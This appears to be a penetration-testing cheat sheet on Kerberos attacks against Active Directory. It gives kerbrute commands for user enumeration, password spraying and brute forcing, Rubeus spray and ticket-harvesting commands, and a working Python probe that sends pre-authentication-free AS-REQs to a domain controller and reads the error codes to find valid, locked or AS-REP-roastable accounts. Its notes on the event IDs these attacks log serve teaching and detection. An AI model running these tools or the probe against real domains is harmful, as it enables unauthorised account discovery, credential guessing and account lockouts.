<aside> 💡
Kerberos needs a fully qualified domain name (FQDN) for the target: the client builds the service principal name (e.g. cifs/host.domain.local) from the hostname. If you address a machine by IP address instead, Windows falls back to NTLM, not Kerberos. Use the hostname (and make sure it resolves, via DNS or /etc/hosts) whenever you need Kerberos.
</aside>
# user enumeration: one AS-REQ without pre-auth per candidate name; the KDC's error code tells
# existing users from unknown ones. No failed-logon (4625) events and no badPwdCount increment,
# but Kerberos auditing on the DC still records each request (event 4768 with the failure code).
kerbrute userenum --dc $DC_IP --domain $DOMAIN $USERNAME_LIST
kerbrute userenum --dc $DC_IP --domain wook.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
# password guessing: each failed attempt counts against the lockout threshold and is logged as
# event 4771 (Kerberos pre-authentication failed). Check the lockout policy before spraying.
# one password against a list of users ($PWD is the shell's working directory, so don't reuse it)
kerbrute passwordspray --dc $DC_IP --domain $DOMAIN $USERNAME_LIST $PASSWORD
# a password list against a single user (locks the account if the threshold is low)
kerbrute bruteuser --dc $DC_IP --domain $DOMAIN $PASSWORD_LIST $USER
# credslist contains [user]:[pass] on each line
kerbrute bruteforce --dc $DC_IP --domain $DOMAIN $CREDS_LIST
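To show what kerbrute userenum actually does on the wire, here is an added example (not kerbrute's code) that builds a Kerberos AS-REQ without pre-authentication data with a tiny DER encoder, sends it to TCP/88 and classifies the KRB-ERROR error code the KDC returns. The realm wook.local, the username alice and the DC address are assumptions for illustration; build_krb_error() is a constructed fixture in the shape of a real KRB-ERROR so the decoder can be exercised offline.

```python
"""Kerberos pre-auth probe: the mechanism behind kerbrute userenum (added example)."""
import socket
import struct

# KRB-ERROR error codes (RFC 4120, 7.5.9) that matter for enumeration and spraying
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6    # no such user
KDC_ERR_CLIENT_REVOKED = 18        # user exists but is locked out or disabled
KDC_ERR_KEY_EXPIRED = 23           # user exists, password expired
KDC_ERR_PREAUTH_FAILED = 24        # user exists, wrong password
KDC_ERR_PREAUTH_REQUIRED = 25      # user exists, pre-auth needed (no password tried)
VERDICTS = {
    KDC_ERR_C_PRINCIPAL_UNKNOWN: "user does not exist",
    KDC_ERR_CLIENT_REVOKED: "user exists (locked out or disabled)",
    KDC_ERR_KEY_EXPIRED: "user exists (password expired)",
    KDC_ERR_PREAUTH_FAILED: "user exists (pre-auth failed)",
    KDC_ERR_PREAUTH_REQUIRED: "user exists (pre-auth required)",
}

# --- minimal DER encoder (Kerberos uses explicit tagging everywhere) ---------
def _len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + _len(len(body)) + body

def ctx(n, body):          # [n] context-specific, constructed
    return tlv(0xA0 | n, body)

def app(n, body):          # [APPLICATION n], constructed
    return tlv(0x60 | n, body)

def seq(*parts):
    return tlv(0x30, b"".join(parts))

def integer(v):            # minimal two's-complement encoding
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def gstring(s):            # KerberosString = GeneralString
    return tlv(0x1B, s.encode("ascii"))

def principal(name_type, *names):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gstring(n) for n in names])))

def build_as_req(username, realm, nonce=0x12345678):
    """AS-REQ for username@REALM with the PA-DATA field deliberately omitted."""
    realm = realm.upper()
    body = seq(
        ctx(0, tlv(0x03, b"\x00" + struct.pack(">I", 0x40800010))),  # forwardable|renewable|renewable-ok
        ctx(1, principal(1, username)),                               # NT-PRINCIPAL
        ctx(2, gstring(realm)),
        ctx(3, principal(2, "krbtgt", realm)),                        # NT-SRV-INST krbtgt/REALM
        ctx(5, tlv(0x18, b"20370913024805Z")),                        # till (GeneralizedTime)
        ctx(7, integer(nonce)),
        ctx(8, seq(integer(18), integer(17), integer(23))),           # AES256, AES128, RC4
    )
    return app(10, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))

# --- minimal DER reader for the reply ---------------------------------------
def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def parse_krb_error(msg):
    """error-code of a KRB-ERROR ([APPLICATION 30]); None for any other message."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x7E:
        return None
    _, sbody, _ = _read_tlv(body, 0)            # the SEQUENCE inside
    pos = 0
    while pos < len(sbody):
        ctag, cval, pos = _read_tlv(sbody, pos)
        if ctag == 0xA6:                        # [6] error-code
            _, ival, _ = _read_tlv(cval, 0)
            return int.from_bytes(ival, "big", signed=True)
    return None

def classify_reply(msg):
    if msg[:1] == b"\x6B":                      # AS-REP: TGT issued with no pre-auth at all
        return "user exists, pre-auth not required (AS-REP roastable)"
    code = parse_krb_error(msg)
    return "unrecognised reply" if code is None else VERDICTS.get(code, "KRB-ERROR %d" % code)

def build_krb_error(code):
    """Constructed fixture shaped like a real KRB-ERROR (for offline testing only)."""
    return app(30, seq(ctx(0, integer(5)), ctx(1, integer(30)), ctx(4, tlv(0x18, b"20240101000000Z")),
                       ctx(5, integer(0)), ctx(6, integer(code)), ctx(9, gstring("WOOK.LOCAL")),
                       ctx(10, principal(2, "krbtgt", "WOOK.LOCAL"))))

def probe(dc_ip, realm, username, timeout=5):
    """One AS-REQ over TCP/88 (4-byte big-endian length prefix); returns the verdict string."""
    req = build_as_req(username, realm)
    with socket.create_connection((dc_ip, 88), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        n = struct.unpack(">I", s.recv(4))[0]
        data = b""
        while len(data) < n:
            chunk = s.recv(n - len(data))
            if not chunk:
                break
            data += chunk
    return classify_reply(data)

if __name__ == "__main__":
    print(probe("10.10.10.10", "wook.local", "alice"))   # assumed DC address and user
```

Every probe is one unauthenticated AS-REQ, which is why it does not touch badPwdCount: the KDC rejects the request before any password material is involved. The same decoder distinguishes the codes a spray produces (24 for a wrong password, 18 once the account locks), which is how a tool can stop early instead of locking out the rest of the list.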
# password spraying
rubeus.exe brute /password:[password] /noticket
# harvesting tickets
rubeus.exe harvest /interval:30
# wordlists
<https://github.com/insidetrust/statistically-likely-usernames>